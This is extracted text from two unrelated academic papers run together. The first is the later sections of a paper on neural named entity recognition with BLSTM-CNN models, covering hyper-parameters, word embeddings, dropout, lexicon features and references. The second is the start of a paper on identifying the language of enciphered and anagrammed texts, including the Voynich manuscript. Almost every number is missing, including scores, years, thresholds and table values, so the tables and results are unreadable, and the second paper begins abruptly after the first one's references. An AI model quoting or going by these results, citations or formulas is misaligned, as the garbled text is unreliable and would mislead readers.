note that starred results are repeated for ease of comparison. . dataset preprocessing for all datasets, we performed the following pre- processing: • all digit sequences are replaced by a single “ ”. • before training, we group sentences by word length into mini-batches and shuffle them. in addition, for the ontonotes dataset, in order to handle the date, time, money, percent, quantity, ordinal, and cardinal named en- tity tags, we split tokens before and after every digit. . conll dataset the conll- dataset (tjong kim sang and de meulder, ) consists of newswire from the reuters rcv corpus tagged with four types of named entities: location, organization, person, and miscellaneous. as the dataset is small compared to ontonotes, we trained the model on both the train- ing and development sets after performing hyper- parameter optimization on the development set. . ontonotes . dataset pradhan et al. ( ) compiled a core portion of the ontonotes . dataset for the conll- shared task and described a standard train/dev/test split, which we use for our evaluation. following durrett and klein ( ), we applied our model to the por- tion of the dataset with gold-standard named entity annotations; the new testaments portion was ex- cluded for lacking gold-standard annotations. this dataset is much larger than conll- and con- sists of text from a wide variety of sources, such as broadcast conversation, broadcast news, newswire, magazine, telephone conversation, and web text. . hyper-parameter optimization we performed two rounds of hyper-parameter opti- mization and selected the best settings based on de- velopment set performance . table shows the fi- nal hyper-parameters, and table shows the dev set performance of the best models in each round. in the first round, we performed random search and selected the best hyper-parameters over the de- velopment set of the conll- data. we evalu- ated around hyper-parameter settings. then, we took the same settings and tuned the learning rate and epochs on the ontonotes development set. for the second round, we performed independent hyper-parameter searches on each dataset using op- tunity’s implementation of particle swarm (claesen et al., ), as there is some evidence that it is more efficient than random search (clerc and kennedy, ). we evaluated hyper-parameter settings this round as well. as we later found out that train- ing fails occasionally (section . ) as well as large variation from run to run, we ran the top settings from each dataset for trials each and selected the best one based on averaged dev set performance. for conll- , we found that particle swarm produced better hyper-parameters than random search. however, surprisingly for ontonotes par- ticle swarm was unable to produce better hyper- parameters than those from the ad-hoc approach in round . we also tried tuning the conll- hyper-parameters from round for ontonotes and that was not any better either. we trained conll- models for a large num- hyper-parameter optimization was done with the blstm- cnn + emb + lex feature set, as it had the best performance. selected based on dev set performance of a few runs. the result is . (± . ) on the ontonotes dev set. word embeddings conll- ontonotes random d . (± . ) . (± . ) random d . (± . ) . (± . ) glove b d . (± . ) . (± . ) glove b d . (± . ) . (± . ) google b d . (± . ) . (± . ) collobert d . (± . ) . (± . ) our glove d . (± . ) . (± . ) our skip-gram d . (± . ) . (± . ) table : f scores when the collobert word vectors are replaced. 
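as a small illustration of the preprocessing listed at the start of this section, the sketch below collapses digit runs and groups sentences of equal length into shuffled mini-batches. the replacement character and batch size are assumptions (the exact values are elided in this excerpt), and the ontonotes-specific splitting of tokens around digits is omitted.

```python
# digit collapsing and length-based mini-batching (illustrative only).
import random
import re
from collections import defaultdict

def preprocess(sentences, batch_size=16):        # batch size is a placeholder
    by_length = defaultdict(list)
    for sent in sentences:
        sent = [re.sub(r"\d+", "0", tok) for tok in sent]   # "0" is an assumed placeholder char
        by_length[len(sent)].append(sent)
    batches = []
    for group in by_length.values():
        for i in range(0, len(group), batch_size):
            batches.append(group[i:i + batch_size])          # same token count within a batch
    random.shuffle(batches)
    return batches
```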
we tried - and -dimensional random vec- tors (random d, random d); glove’s released vec- tors trained on billion words (glove b d, glove b d); google’s released -dimensional vectors trained on billion words from google news (google b d); and -dimensional glove and word vec skip-gram vectors that we trained on wikipedia and reuters rcv- (our glove d, our skip-gram d). ber of epochs because we observed that the models did not exhibit overtraining and instead continued to slowly improve on the development set long af- ter reaching near % accuracy on the training set. in contrast, despite ontonotes being much larger than conll- , training for more than about epochs causes performance on the development set to decline steadily due to overfitting. . excluding failed trials on the conll- dataset, while blstm models completed training without difficulty, the blstm- cnn models fail to converge around ∼ % of the time depending on feature set. similarly, on ontonotes, . % of trials fail. we found that using a lower learning rate reduces failure rate. we also tried clipping gradients and using adadelta and both of them were effective at eliminating such failures by themselves. adadelta, however, made training more expensive with no gain in model performance. in any case, for all experiments we excluded trials where the final f score on a subset of training data falls below a certain threshold, and continued to run trials until we obtained successful ones. for conll- , we excluded trials where the final f score on the development set was less than ; there was no ambiguity in selecting the threshold as every trial scored either above or below . for ontonotes, the threshold was a f score of on the last , sentences of the training set; every trial scored either above or below . . training and tagging speed on an intel xeon e - processor, training takes about hours while tagging the test set takes about seconds for conll- . the times are hours and seconds respectively for ontonotes. results and discussion table shows the results for all datasets. to the best of our knowledge, our best models have sur- passed the previous highest reported f scores for both conll- and ontonotes. in particular, with no external knowledge other than word em- beddings, our model is competitive on the conll- dataset and establishes a new state of the art for ontonotes, suggesting that given enough data, the neural network automatically learns the relevant features for ner without feature engineering. . comparison with ffnns we re-implemented the ffnn model of collobert et al. ( b) as a baseline for comparison. ta- ble shows that while performing reasonably well on conll- , ffnns are clearly inadequate for ontonotes, which has a larger domain, showing that lstm models are essential for ner. . character-level cnns vs. character type and capitalization features the comparison of models in table shows that on conll- , blstm-cnn models significantly outperform the blstm models when given the same feature set. this effect is smaller and not sta- tistically significant on ontonotes when capitaliza- tion features are added. adding character type and capitalization features to the blstm-cnn mod- els degrades performance for conll and mostly improves performance on ontonotes, suggesting character-level cnns can replace hand-crafted char- acter features in some cases, but systems with weak lexicons may benefit from character features. wilcoxon rank sum test, p < . 
when comparing the four blstm models with the corresponding blstm-cnn models using the same feature set. the wilcoxon rank sum test was selected for its robustness against small sample sizes when the distribution is unknown. dropout conll- ontonotes . dev test dev test - . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) . - - . (± . ) . (± . ) . . (± . ) . (± . ) - - . . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) table : f score results with various dropout values. models were trained using only the training set for each dataset. all other experiments use dropout = . for conll- and dropout = . for ontonotes . . . word embeddings table and table show that we obtain a large, sig- nificant improvement when trained word embed- dings are used, as opposed to random embeddings, regardless of the additional features used. this is consistent with collobert et. al. ( b)’s results. table compares the performance of different word embeddings in our best model in table (blstm-cnn + emb + lex). for conll- , the publicly available glove and google embeddings are about one point behind collobert’s embeddings. for ontonotes, glove embeddings perform close to collobert embeddings while google embeddings are again one point behind. in addition, dimen- sional embeddings present no significant improve- ment over dimensional embeddings – a result pre- viously reported by turian et al. ( ). one possible reason that collobert embeddings perform better than other publicly available em- beddings on conll- is that they are trained on the reuters rcv- corpus, the source of the conll- dataset, whereas the other embed- dings are not . on the other hand, we suspect that google’s embeddings perform poorly because of vo- cabulary mismatch - in particular, google’s embed- dings were trained in a case-sensitive manner, and embeddings for many common punctuations and wilcoxon rank sum test, p < . to make a direct comparison to collobert et al. ( b), we do not exclude the conll- ner task test data from the word vector training data. while it is possible that this differ- ence could be responsible for the disparate performance of word vectors, the conll- training data comprises only k out of million words, or . % of the total data; in an un- supervised training scheme, the effects are likely negligible. symbols were not provided. to test these hypothe- ses, we performed experiments with new word em- beddings trained using glove and word vec, with vocabulary list and corpus similar to collobert et. al. ( b). as shown in table , our glove embeddings improved significantly over publicly available embeddings on conll- , and our word vec skip-gram embeddings improved signifi- cantly over google’s embeddings on ontonotes. due to time constraints we did not perform new hyper-parameter searches with any of the word em- beddings. as word embedding quality depends on hyper-parameter choice during their training (pen- nington et al., ), and also, in our ner neural network, hyper-parameter choice is likely sensitive to the type of word embeddings used, optimizing them all will likely produce better results and pro- vide a fairer comparison of word embedding quality. . effect of dropout table compares the result of various dropout val- ues for each dataset. the models are trained using only the training set for each dataset to isolate the effect of dropout on both dev and test sets. 
all other hyper-parameters and features remain the same as our best model in table . in both datasets and on both dev and test sets, dropout is essential for state of the art performance, and the improvement is statistically significant. dropout is optimized on the dev set, as described in section . . hence, the chosen value may not be the best-performing in table .

wilcoxon rank sum test, p < .
wilcoxon rank sum test, p < .
wilcoxon rank sum test, no dropout vs. best setting: p < . for the conll- test set, p < . for the ontonotes . test set, p < . for all others.

figure : fraction of named entities of each tag category matched completely by entries in each lexicon category of the senna/dbpedia combined lexicon. white = higher fraction.

. lexicon features

table shows that on the conll- dataset, using features from both the senna lexicon and our proposed dbpedia lexicon provides a significant improvement and allows our model to clearly surpass the previous state of the art. unfortunately the difference is minuscule for ontonotes, most likely because our lexicon does not match dbpedia categories well. figure shows that on conll- , lexicon coverage is reasonable and matches the tags set for everything except the catch-all misc category. for example, loc entries in lexicon match mostly loc named entities and vice versa. however, on ontonotes, the matches are noisy and correspondence between lexicon match and tag category is quite ambiguous. for example, all lexicon categories have spurious matches in unrelated named entities like cardinal, and loc, gpe, and language entities all get a lot of matches from the loc category in the lexicon. in addition, named entities in categories like norp, org, law, product receive little coverage. the lower coverage, noise, and ambiguity all contribute to the disappointing performance. this suggests that the dbpedia lexicon construction method needs to be improved. a reasonable place to start would be the dbpedia category to ontonotes ne tag mappings.

in order to isolate the contribution of each lexicon and matching method, we compare different sources and matching methods on a blstm-cnn model with randomly initialized word embeddings and no other features or sources of external knowledge. table shows the results. in this weakened model, both lexicons contribute significant improvements over the baseline.

wilcoxon rank sum test, p < . .

compared to the senna lexicon, our dbpedia lexicon is noisier but has broader coverage, which explains why when applying it using the same method as collobert et al. ( b), it performs worse on conll- but better on ontonotes – a dataset containing many more obscure named entities. however, we suspect that the method of collobert et al. ( b) is not noise resistant and therefore unsuitable for our lexicon because it fails to distinguish exact and partial matches and does not set a minimum length for partial matching. instead, when we apply our superior partial matching algorithm and bioes encoding with our dbpedia lexicon, we gain a significant improvement, allowing our lexicon to perform similarly to the senna lexicon.
unfortunately, as we could not reliably re- move partial entries from the senna lexicon, we were unable to investigate whether or not our lexi- con matching method would help in that lexicon. in addition, using both lexicons together as dis- tinct features provides a further improvement on conll- , which we suspect is because the lexi- wilcoxon rank sum test, p < . for senna-exact- bioes, p < . for all others. we achieve this by using bioes encoding and prioritizing exact matches over partial matches. matching only the first word of a long entry is not very useful; this is not a problem in the senna lexicon because % of its entries contain only tokens or less. wilcoxon rank sum test, p < . . wilcoxon rank sum test, p < . . lexicon matching encoding conll- ontonotes no lexicon - - . (± . ) . (± . ) senna exact yn . (± . ) . (± . ) exact bioes . (± . ) . (± . ) dbpedia exact yn . (± . ) . (± . ) exact bioes . (± . ) . (± . ) partial yn . (± . ) . (± . ) partial bioes . (± . ) . (± . ) collobert’s method . (± . ) . (± . ) both best combination . (± . ) . (± . ) table : comparison of lexicon and matching/encoding methods over the blstm-cnn model employing random embeddings and no other features. when using both lexicons, the best combination of matching and encoding is exact-bioes for senna and partial-bioes for dbpedia. note that the senna lexicon already contains “partial entries” so exact matching in that case is really just a more primitive form of partial matching. cons are complementary; the senna lexicon is rel- atively clean and tailored to newswire, whereas the dbpedia lexicon is noisier but has high coverage. . analysis of ontonotes performance table shows the per-genre breakdown of the ontonotes results. as expected, our model per- forms best on clean text like broadcast news (bn) and newswire (nw), and worst on noisy text like telephone conversation (tc) and web text (wb). our model also substantially improves over previous work on all genres except tc, where the small size of the training data likely hinders learning. finally, the performance characteristics of our model appear to be quite different than the previous crf mod- els (finkel and manning, ; durrett and klein, ), likely because we apply a completely differ- ent machine learning method. related research named entity recognition is a task with a long his- tory. in this section, we summarize the works we compare with and that influenced our approach. . named entity recognition most recent approaches to ner have been charac- terized by the use of crf, svm, and perceptron models, where performance is heavily dependent on feature engineering. ratinov and roth ( ) used non-local features, a gazetteer extracted from we downloaded their publicly released software and model to perform the per-genre evaluation. wikipedia, and brown-cluster-like word representa- tions, and achieved an f score of . on conll- . lin and wu ( ) surpassed them without using a gazetteer by instead using phrase features obtained by performing k-means clustering over a private database of search engine query logs. passos et al. ( ) obtained nearly the same performance using only public data by training phrase vectors in their lexicon-infused skip-gram model. in order to combat the problem of sparse features, suzuki et al. ( ) employed large-scale unlabelled data to per- form feature reduction and achieved an f score of . on conll- , which is the current state of the art for systems without external knowledge. 
training an ner system together with related tasks such as entity linking has recently been shown to improve the state of the art. durrett and klein ( ) combined coreference resolution, entity link- ing, and ner into a single crf model and added cross-task interaction factors. their system achieved state of the art results on the ontonotes dataset, but they did not evaluate on the conll- dataset due to lack of coreference annotations. luo et al. ( ) achieved state of the art results on conll- by training a joint model over the ner and entity linking tasks, the pair of tasks whose inter- dependencies contributed the most to the work of durrett and klein ( ). . ner with neural networks while many approaches involve crf models, there has also been a long history of research involving neural networks. early attempts were hindered by model bc bn mz nw tc wb test set size (# tokens) , , , , , , test set size (# entities) , , , , , finkel and manning ( ) . . . . . . durrett and klein ( ) . . . . . . blstm-cnn . . . . . . blstm-cnn + emb . . . . . . blstm-cnn + emb + lex . . . . . . table : per genre f scores on ontonotes. bc = broadcast conversation, bn = broadcast news, mz = magazine, nw = newswire, tc = telephone conversation, wb = blogs and newsgroups lack of computational power, scalable learning algo- rithms, and high quality word embeddings. petasis et al. ( ) used a feed-forward neural network with one hidden layer on ner and achieved state-of-the-art results on the muc dataset. their approach used only pos tag and gazetteer tags for each word, with no word embeddings. hammerton ( ) attempted ner with a single- direction lstm network and a combination of word vectors trained using self-organizing maps and con- text vectors obtained using principle component analysis. however, while our method optimizes log- likelihood and uses softmax, they used a different output encoding and optimized an unspecified ob- jective function. hammerton’s ( ) reported re- sults were only slightly above baseline models. much later, with the advent of neural word embeddings, collobert et al. ( b) presented senna, which employs a deep ffnn and word embeddings to achieve near state of the art results on pos tagging, chunking, ner, and srl. we build on their approach, sharing the word embeddings, fea- ture encoding method, and objective functions. recently, santos et al. ( ) presented their charwnn network, which augments the neural net- work of collobert et al. ( b) with character level cnns, and they reported improved performance on spanish and portuguese ner. we have successfully incorporated character-level cnns into our model. there have been various other similar architec- ture proposed for various sequential labeling nlp tasks. huang et al. ( ) used a blstm for the pos-tagging, chunking, and ner tasks, but they employed heavy feature engineering instead of using a cnn to automatically extract character- level features. labeau et al. ( ) used a brnn with character-level cnns to perform german pos- tagging; our model differs in that we use the more powerful lstm unit, which we found to perform better than rnns in preliminary experiments, and that we employ word embeddings, which is much more important in ner than in pos tagging. ling et al. ( ) used both word- and character-level blstms to establish the current state of the art for english pos tagging. 
while using blstms in- stead of cnns allows extraction of more sophisti- cated character-level features, we found in prelim- inary experiments that for ner it did not perform significantly better than cnns and was substantially more computationally expensive to train. conclusion we have shown that our neural network model, which incorporates a bidirectional lstm and a character-level cnn and which benefits from robust training through dropout, achieves state-of-the-art results in named entity recognition with little feature engineering. our model improves over previous best reported results on two major datasets for ner, sug- gesting that the model is capable of learning com- plex relationships from large amounts of data. preliminary evaluation of our partial matching lexicon algorithm suggests that performance could be further improved through more flexible appli- cation of existing lexicons. evaluation of existing word embeddings suggests that the domain of train- ing data is as important as the training algorithm. more effective construction and application of lexicons and word embeddings are areas that require more research. in the future, we would also like to extend our model to perform similar tasks such as extended tagset ner and entity linking. acknowledgments this research was supported by honda research in- stitute japan co., ltd. the authors would like to thank collobert et al. ( b) for releasing senna with its word vectors and lexicon, the torch frame- work contributors, and andrey karpathy for the ref- erence lstm implementation. references sören auer, christian bizer, georgi kobilarov, jens lehmann, richard cyganiak, and zachary ives. . dbpedia: a nucleus for a web of open data. in the semantic web, pages – . springer. phil blunsom, edward grefenstette, nal kalchbrenner, et al. . a convolutional neural network for mod- elling sentences. in proceedings of the nd annual meeting of the association for computational linguis- tics. association for computational linguistics. kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. . on the proper- ties of neural machine translation: encoder-decoder approaches. in proceedings of ssst- , eighth work- shop on syntax, semantics and structure in statistical translation, pages – . association for compu- tational linguistics. marc claesen, jaak simm, dusan popovic, yves moreau, and bart de moor. easy hyperparameter search using optunity. in proceedings of the interna- tional workshop on technical computing for machine learning and mathematical engineering. maurice clerc and james kennedy. . the particle swarm-explosion, stability, and convergence in a mul- tidimensional complex space. evolutionary computa- tion, ieee transactions on, ( ): – . ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proceed- ings of the th international conference on machine learning, pages – . acm. ronan collobert, koray kavukcuoglu, and clément farabet. a. torch : a matlab-like environment for machine learning. in proceedings of biglearn, nips workshop, number epfl-conf- . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. b. natural language processing (almost) from scratch. the journal of machine learning research, : – . greg durrett and dan klein. . a joint model for en- tity analysis: coreference, typing, and linking. trans- actions of the association for computational linguis- tics, : – . 
jenny rose finkel and christopher d manning. . joint parsing and named entity recognition. in pro- ceedings of human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – . association for computational linguistics. felix a gers, jürgen schmidhuber, and fred cummins. . learning to forget: continual prediction with lstm. neural computation, ( ): – . christoph goller and andreas kuchler. . learning task-dependent distributed representations by back- propagation through structure. in neural networks, ., ieee international conference on, volume , pages – . ieee. alan graves, abdel-rahman mohamed, and geoffrey hinton. . speech recognition with deep recurrent neural networks. in proceedings of the ieee in- ternational conference on acoustics, speech and sig- nal processing, pages – . james hammerton. . named entity recognition with long short-term memory. in proceedings of the seventh conference on natural language learning at hlt-naacl , pages – . association for computational linguistics. geoffrey hinton, nitish srivastava, and kevin swersky. . lecture e: rmsprop: divide the gradient by a running average of its recent magnitude. in neural networks for machine learning. http: //www.cs.toronto.edu/˜tijmen/csc / slides/lecture_slides_lec .pdf. eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of the human lan- guage technology conference of the naacl, com- panion volume: short papers, pages – . associ- ation for computational linguistics. zhiheng huang, wei xu, and kai yu. . bidi- rectional lstm-crf models for sequence tagging. corr, abs/ . . matthieu labeau, kevin löser, and alexandre allauzen. . non-lexical neural architecture for fine-grained pos tagging. in proceedings of the conference on empirical methods in natural language process- ing, pages – . association for computational linguistics. dekang lin and xiaoyun wu. . phrase clustering for discriminative learning. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natu- ral language processing of the afnlp, pages – . association for computational linguistics. http://www.cs.toronto.edu/~tijmen/csc /slides/lecture_slides_lec .pdf http://www.cs.toronto.edu/~tijmen/csc /slides/lecture_slides_lec .pdf http://www.cs.toronto.edu/~tijmen/csc /slides/lecture_slides_lec .pdf wang ling, chris dyer, alan w black, isabel trancoso, ramon fermandez, silvio amir, luis marujo, and tiago luis. . finding function in form: com- positional character models for open vocabulary word representation. in proceedings of the conference on empirical methods in natural language process- ing, pages – . association for computational linguistics. gang luo, xiaojiang huang, chin-yew lin, and za- iqing nie. . joint entity recognition and disam- biguation. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational lin- guistics. tomas mikolov, stefan kombrink, anoop deoras, lukar burget, and jan cernocky. . rnnlm-recurrent neural network language modeling toolkit. in pro- ceedings of the asru workshop, pages – . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. . distributed representa- tions of words and phrases and their compositionality. in proceedings of the twenty-seventh annual confer- ence on advances in neural information processing systems, pages – . 
yurii nesterov. . a method of solving a convex pro- gramming problem with convergence rate o( /k ). soviet mathematics doklady, ( ): – . alexandre passos, vineet kumar, and andrew mccal- lum. . lexicon infused phrase embeddings for named entity resolution. in proceedings of the eigh- teenth conference on computational natural lan- guage learning, pages – . association for com- putational linguistics. jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language processing, pages – . g petasis, s petridis, g paliouras, v karkaletsis, sj perantonis, and cd spyropoulos. . symbolic and neural learning for named-entity recognition. in proceedings of the symposium on computational in- telligence and learning, pages – . citeseer. vu pham, théodore bluche, christopher kermorvant, and jérôme louradour. . dropout improves re- current neural networks for handwriting recognition. in proceedings of the th international conference on frontiers in handwriting recognition, pages – . ieee. sameer pradhan, alessandro moschitti, nianwen xue, hwee tou ng, anders björkelund, olga uryupina, yuchen zhang, and zhi zhong. . towards robust linguistic analysis using ontonotes. in proceedings of the seventeenth conference on computational nat- ural language learning, pages – . association for computational linguistics. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in proceedings of the thirteenth conference on compu- tational natural language learning, pages – . association for computational linguistics. david rumelhart, geoffrey hinton, and ronald williams. . learning representations by back-propagating errors. nature, pages – . cıcero santos, victor guimaraes, rj niterói, and rio de janeiro. . boosting named entity recognition with neural character embeddings. in proceedings of the fifth named entities workshop, pages – . jun suzuki, hideki isozaki, and masaaki nagata. . learning condensed feature representations from large unsupervised data sets for supervised learning. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies: short papers, pages – . associa- tion for computational linguistics. erik f tjong kim sang and fien de meulder. . in- troduction to the conll- shared task: language- independent named entity recognition. in proceed- ings of the seventh conference on natural language learning at hlt-naacl , pages – . asso- ciation for computational linguistics. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computa- tional linguistics. matthew d. zeiler. . adadelta: an adaptive learning rate method. corr, abs/ . . decoding anagrammed texts written in an unknown language and script bradley hauer and grzegorz kondrak department of computing science university of alberta edmonton, canada {bmhauer,gkondrak}@ualberta.ca abstract algorithmic decipherment is a prime exam- ple of a truly unsupervised problem. the first step in the decipherment process is the iden- tification of the encrypted language. we pro- pose three methods for determining the source language of a document enciphered with a monoalphabetic substitution cipher. the best method achieves % accuracy on lan- guages. 
we then present an approach to de- coding anagrammed substitution ciphers, in which the letters within words have been ar- bitrarily transposed. it obtains the average de- cryption word accuracy of % on a set of ciphertexts in languages. finally, we report the results on the voynich manuscript, an un- solved fifteenth century cipher, which suggest hebrew as the language of the document. introduction the voynich manuscript is a medieval codex con- sisting of pages written in a unique script, which has been referred to as the world’s most important unsolved cipher (schmeh, ). the type of ci- pher that was used to generate the text is unknown; a number of theories have been proposed, includ- ing substitution and transposition ciphers, an abjad (a writing system in which vowels are not written), steganography, semi-random schemes, and an elab- orate hoax. however, the biggest obstacle to deci- the manuscript was radiocarbon dated to - ad in the arizona accelerator mass spectrometry labo- ratory (http://www.arizona.edu/crack-voynich-code, accessed nov. , ). phering the manuscript is the lack of knowledge of what language it represents. identification of the underlying language has been crucial for the decipherment of ancient scripts, in- cluding egyptian hieroglyphics (coptic), linear b (greek), and mayan glyphs (ch’olti’). on the other hand, the languages of many undeciphered scripts, such as linear a, the indus script, and the phaistos disc, remain unknown (robinson, ). even the order of characters within text may be in doubt; in egyptian hieroglyphic inscriptions, for instance, the symbols were sometimes rearranged within a word in order to create a more elegant inscription (singh, ). another complicating factor is the omission of vowels in some writing systems. applications of ciphertext language identification extend beyond secret ciphers and ancient scripts. nagy et al. ( ) frame optical character recogni- tion as a decipherment task. knight et al. ( ) note that for some languages, such as hindi, there exist many different and incompatible encoding schemes for digital storage of text; the task of an- alyzing such an arbitrary encoding scheme can be viewed as a decipherment of a substitution cipher in an unknown language. similarly, the unsupervised derivation of transliteration mappings between dif- ferent writing scripts lends itself to a cipher formu- lation (ravi and knight, ). the voynich manuscript is written in an unknown script that encodes an unknown language, which is the most challenging type of a decipherment prob- lem (robinson, , p. ). inspired by the mys- tery of both the voynich manuscript and the un- deciphered ancient scripts, we develop a series of transactions of the association for computational linguistics, vol. , pp. – , . action editor: regina barzilay. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. algorithms for the purpose of decrypting unknown alphabetic scripts representing unknown languages. we assume that symbols in scripts which contain no more than a few dozen unique characters roughly correspond to phonemes of a language, and model them as monoalphabetic substitution ciphers. we further allow that an unknown transposition scheme could have been applied to the enciphered text, resulting in arbitrary scrambling of letters within words (anagramming). finally, we consider the pos- sibility that the underlying script is an abjad, in which only consonants are explicitly represented. 
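to make the assumed encipherment process concrete, the sketch below (ours, not from the paper) applies a random monoalphabetic substitution, scrambles the letters within each word, and optionally drops vowels to simulate an abjad; the english alphabet and vowel set are used only as an example.

```python
# illustrative encipherment: substitution + within-word anagramming (+ optional abjad).
import random
import string

def encipher(plaintext, drop_vowels=False, seed=0):
    rng = random.Random(seed)
    letters = list(string.ascii_lowercase)
    shuffled = letters[:]
    rng.shuffle(shuffled)
    key = dict(zip(letters, shuffled))            # 1-to-1 substitution key
    words_out = []
    for word in plaintext.lower().split():
        chars = [key.get(c, c) for c in word]     # substitute each symbol
        if drop_vowels:                           # abjad: drop enciphered vowels
            enc_vowels = {key[v] for v in "aeiou"}
            chars = [c for c in chars if c not in enc_vowels]
        rng.shuffle(chars)                        # arbitrary transposition within the word
        words_out.append("".join(chars))
    return " ".join(words_out)
```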
our decryption system is composed of three steps. the first task is to identify the language of a cipher- text, by comparing it to samples representing known languages. the second task is to map each symbol of the ciphertext to the corresponding letter in the identified language. the third task is to decode the resulting anagrams into readable text, which may in- volve the recovery of unwritten vowels. the paper is structured as follows. we discuss re- lated work in section . in section , we propose three methods for the source language identification of texts enciphered with a monoalphabetic substitu- tion cipher. in section , we present and evaluate our approach to the decryption of texts composed of en- ciphered anagrams. in section , we apply our new techniques to the voynich manuscript. section concludes the paper. related work in this section, we review particularly relevant prior work on the voynich manuscript, and on algorithmic decipherment in general. . voynich manuscript since the discovery of the voynich manuscript (henceforth referred to as the vms), there have been a number of decipherments claims. newbold and kent ( ) proposed an interpretation based on mi- croscopic details in the text, which was subsequently refuted by manly ( ). other claimed decipher- ments by feely ( ) and strong ( ) have also been refuted (tiltman, ). a detailed study of the manuscript by d’imperio ( ) details various other proposed solutions and the arguments against them. figure : a sample from the voynich manuscript. numerous languages have been proposed to un- derlie the vms. the properties and the dating of the manuscript imply latin and italian as potential can- didates. on the basis of the analysis of the character frequency distribution, jaskiewicz ( ) identifies five most probable languages, which include mol- davian and thai. reddy and knight ( ) discover an excellent match between the vms and quranic arabic in the distribution of word lengths, as well as a similarity to chinese pinyin in the predictability of letters given the preceding letter. it has been suggested previously that some ana- gramming scheme may alter the sequence order of characters within words in the vms. tiltman ( ) observes that each symbol behaves as if it had its own place in an “order of precedence” within words. rugg ( ) notes the apparent similarity of the vms to a text in which each word has been replaced by an alphabetically ordered anagram (alphagram). reddy and knight ( ) show that the letter se- quences are generally more predictable than in nat- ural languages. some researchers have argued that the vms may be an elaborate hoax created to only appear as a meaningful text. rugg ( ) suggests a tabular method, similar to the sixteenth century technique of the cardan grille, although recent dating of the manuscript to the fifteenth century provides evi- dence to the contrary. schinner ( ) uses analy- sis of random walk techniques and textual statistics to support the hoax hypothesis. on the other hand, landini ( ) identifies in the vms language-like statistical properties, such as zipf’s law, which were only discovered in the last century. similarly, mon- temurro and zanette ( ) use information theo- retic techniques to find long-range relationships be- tween words and sections of the manuscript, as well as between the text and the figures in the vms. . 
algorithmic decipherment a monoalphabetic substitution cipher is a well- known method of enciphering a plaintext by con- verting it into a ciphertext of the same length using a -to- mapping of symbols. knight et al. ( ) propose a method for deciphering substitution ci- phers which is based on viterbi decoding with map- ping probabilities computed with the expectation- maximization (em) algorithm. the method cor- rectly deciphers % of symbols in a -letter ci- phertext when a trigram character language model is used. they apply their method to ciphertext language identification using different language samples, and report successful outcomes on three ci- phers that represent english, spanish, and a spanish abjad, respectively. ravi and knight ( ) present a more complex but slower method for solving substitution ciphers, which incorporates constraints that model the -to- property of the key. the objective function is again the probability of the decipherment relative to an n- gram character language model. a solution is found by optimally solving an integer linear program. knight et al. ( ) describe a successful deci- pherment of an eighteenth century text known as the copiale cipher. language identification was the first step of the process. the em-based method of knight et al. ( ) identified german as the most likely candidate among over candidate charac- ter language models. the more accurate method of ravi and knight ( ) was presumably either too slow or too brittle for this purpose. the cipher was eventually broken using a combination of man- ual and algorithmic techniques. hauer et al. ( ) present an approach to solv- ing monoalphabetic substitution ciphers which is more accurate than other algorithms proposed for this task, including knight et al. ( ), ravi and knight ( ), and norvig ( ). we provide a detailed description of the method in section . . source language identification in this section, we propose and evaluate three meth- ods for determining the source language of a docu- ment enciphered with a monoalphabetic substitution cipher. we frame it as a classification task, with the classes corresponding to the candidate languages, which are represented by short sample texts. the methods are based on: . relative character frequencies, . patterns of repeated symbols within words, . the outcome of a trial decipherment. . character frequency an intuitive way of guessing the source language of a ciphertext is by character frequency analysis. the key observation is that the relative frequencies of symbols in the text are unchanged after encipher- ment with a -to- substitution cipher. the idea is to order the ciphertext symbols by frequency, normal- ize these frequencies to create a probability distri- bution, and choose the closest matching distribution from the set of candidate languages. more formally, let pt be a discrete probability distribution where pt (i) is the probability of a ran- domly selected symbol in a text t being the ith most frequent symbol. we define the distance between two texts u and v to be the bhattacharyya ( ) distance between the probability distributions pu and pv : d(u, v ) = − ln ∑ i √ pu(i) ·pv (i) the advantages of this distance metric include its symmetry, and the ability to account for events that have a zero probability (in this case, due to different alphabet sizes). the language of the closest sample text to the ciphertext is considered to be the most likely source language. 
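a minimal sketch of this character-frequency method follows: the symbols of each text are ranked by frequency, the rank distributions are normalized, and the candidate language whose sample minimizes the bhattacharyya distance d(u, v) = −ln Σi √(pu(i) · pv(i)) is selected. treating whitespace as a word separator to be ignored is an assumption of the sketch.

```python
# language identification by bhattacharyya distance between rank-frequency distributions.
import math
from collections import Counter

def rank_distribution(text):
    counts = sorted(Counter(c for c in text if not c.isspace()).values(), reverse=True)
    total = sum(counts)
    return [c / total for c in counts]   # p(i): probability of the i-th most frequent symbol

def bhattacharyya(p, q):
    n = max(len(p), len(q))              # pad with zeros to handle different alphabet sizes
    p = p + [0.0] * (n - len(p))
    q = q + [0.0] * (n - len(q))
    return -math.log(sum(math.sqrt(a * b) for a, b in zip(p, q)))

def identify_language(ciphertext, samples):
    """samples: dict mapping a language name to a sample text in that language."""
    pc = rank_distribution(ciphertext)
    return min(samples,
               key=lambda lang: bhattacharyya(pc, rank_distribution(samples[lang])))
```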
this method is not only fast but also robust against letter reordering and the lack of word boundaries.

. decomposition pattern frequency

our second method expands on the character frequency method by incorporating the notion of decomposition patterns. this method uses multiple occurrences of individual symbols within a word as a clue to the language of the ciphertext. for example, the word seems contains two instances of ‘s’ and ‘e’, and one instance of ‘m’. we are interested in capturing the relative frequency of such patterns in texts, independent of the symbols used.

